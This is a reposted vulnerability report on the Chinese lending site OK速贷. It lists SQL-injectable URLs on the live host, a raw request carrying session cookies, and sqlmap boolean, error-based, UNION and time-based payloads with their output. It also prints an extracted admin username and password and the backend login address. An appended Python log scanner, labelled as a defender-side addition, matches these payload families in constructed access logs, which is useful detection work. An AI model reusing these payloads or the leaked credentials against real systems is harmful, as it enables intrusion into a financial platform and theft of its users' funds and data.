Recording the best of hacking techniques, spreading hacker culture, sharing the essence of hacking technology

OK速贷: multiple high-risk vulnerabilities give access to the admin backend, with tens of millions in funds at stake

2015-05-18 20:40

Injection 1:


GET /?plugins&q=areas&area_id=174 HTTP/1.1
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Accept-Encoding: gzip,deflate
Cache-Control: max-age=0
Host: www1.okisbank.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36
DNT: 1
Connection: close
Cookie: PHPSESSID=ja1oli3mo1pdjfmpfi8qitrfv3; _jzqx=1.1426652708.1426652708.1.jzqsr=okisbank%2Ecom|jzqct=/user/login%2Ehtml.-; _jzqckmp=1; _ga=GA1.2.264870878.1426652708; _jzqa=1.1246666155320797000.1426652708.1426652708.1426735724.2; _jzqc=1; LXB_REFER=74.125.227.77; _jzqb=1.4.10.1426735724.1; Hm_lvt_0fed600eaace02a001f9ebf0a244f274=1426651774,1426654101,1426654412,1426736984; Hm_lpvt_0fed600eaace02a001f9ebf0a244f274=1426737794; dy_cookie_time=604800; 6ec6cef6a06f93620f0bd7d4d7d741d6=bab4m9R8As45YzkwT%2FjAdIivXGmOFOW8KgPRwOwCjy3WF373l%2BD1rX%2BO0gw
AlexaToolbar-ALX_NS_PH: AlexaToolbar/alxg-3.3


Injection 2: http://www1.okisbank.com/u/215'

Injection 3: http://www1.okisbank.com/?user&q=code/borrow/loan&p=repay&type=tender&username=189

Almost every search field in the user interface is injectable, for example:
http://www1.okisbank.com/?user&q=code/borrow/tender&p=now&keywords=111%27&dotime1=2015-03-19&dotime2=2015-03-19

sqlmap output for injection 1 (the area_id parameter):
Parameter: #1*
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://www1.okisbank.com:80/?plugins&q=areas&area_id=174 AND 1731=1731
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: http://www1.okisbank.com:80/?plugins&q=areas&area_id=174 AND (SELECT 5321 FROM(SELECT COUNT(*),CONCAT(0x7163706271,(SELECT (CASE WHEN (5321=5321) THEN 1 ELSE 0 END)),0x7166796971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: UNION query
Title: MySQL UNION query (NULL) - 9 columns
Payload: http://www1.okisbank.com:80/?plugins&q=areas&area_id=174 UNION ALL SELECT NULL,CONCAT(0x7163706271,0x4f694676505649465261,0x7166796971),NULL,NULL,NULL,NULL,NULL,NULL,NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: http://www1.okisbank.com:80/?plugins&q=areas&area_id=174 AND SLEEP(5)
---
[12:18:42] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.17
back-end DBMS: MySQL 5.0
[12:18:42] [INFO] fetching tables for database: 'okisbank'
Database: okisbank
[134 tables]
Admin account extracted via the injection: ok速贷 / ok123, backend login at http://www1.okisbank.com/?admin
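As an added, defender-side example (not part of the original report): a small Python scanner that applies the four sqlmap technique families shown above (boolean-based, error-based, UNION, time-based) plus the bare-quote probe used in injections 2 and 3 to access-log lines. The IIS-style field layout and the log lines themselves are constructed for this example, modelled on the report's requests, and are not from the target.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample log lines (assumption, not from the report), laid out as
# "date time method uri-stem uri-query status"; spaces in queries are %20-encoded
# as a web server would log them. Line 1 is a benign request, the rest mirror the
# report's sqlmap payloads (the error-based one shortened) and quote probes.
SAMPLE_LOG = """\
2015-05-18 12:18:01 GET / plugins&q=areas&area_id=174 200
2015-05-18 12:18:42 GET / plugins&q=areas&area_id=174%20AND%201731=1731 200
2015-05-18 12:18:43 GET / plugins&q=areas&area_id=174%20AND%20(SELECT%205321%20FROM(SELECT%20COUNT(*),CONCAT(0x7163706271,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a) 500
2015-05-18 12:18:44 GET / plugins&q=areas&area_id=174%20UNION%20ALL%20SELECT%20NULL,NULL,NULL%23 200
2015-05-18 12:18:45 GET / plugins&q=areas&area_id=174%20AND%20SLEEP(5) 200
2015-05-18 12:19:10 GET / user&q=code/borrow/tender&p=now&keywords=111%27&dotime1=2015-03-19 200
2015-05-18 12:19:11 GET /u/215' - 200
"""

# One regex per technique family seen in the sqlmap output above; the last one
# flags the lone quote that injections 2 and 3 use as a probe (weakest signal).
SIGNATURES = [
    ("boolean-blind", re.compile(r"\b(AND|OR)\s+\d+\s*=\s*\d+", re.I)),
    ("error-based",   re.compile(r"FLOOR\s*\(\s*RAND\s*\(|INFORMATION_SCHEMA", re.I)),
    ("union",         re.compile(r"UNION\s+(ALL\s+)?SELECT\b", re.I)),
    ("time-blind",    re.compile(r"\b(SLEEP|BENCHMARK)\s*\(", re.I)),
    ("quote-probe",   re.compile(r"['\"]")),
]


def classify_request(uri_stem, uri_query):
    """Return the names of every family whose signature matches the request.
    The stem and query are URL-decoded first so %27 / %20 are inspected as the
    quote and space the database layer would actually receive."""
    decoded = unquote_plus(uri_stem + "?" + uri_query)
    return [name for name, rx in SIGNATURES if rx.search(decoded)]


def scan_log(text):
    """Parse the constructed log layout and return (time, request, families)
    for every line that matches at least one signature."""
    hits = []
    for line in text.splitlines():
        _date, time, _method, stem, query, _status = line.split(" ", 5)
        families = classify_request(stem, "" if query == "-" else query)
        if families:
            hits.append((time, stem + "?" + query, families))
    return hits


if __name__ == "__main__":
    for time, request, families in scan_log(SAMPLE_LOG):
        print(time, ",".join(families), request)
```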




Source: www.2cto.com/Article/201505/399617.html
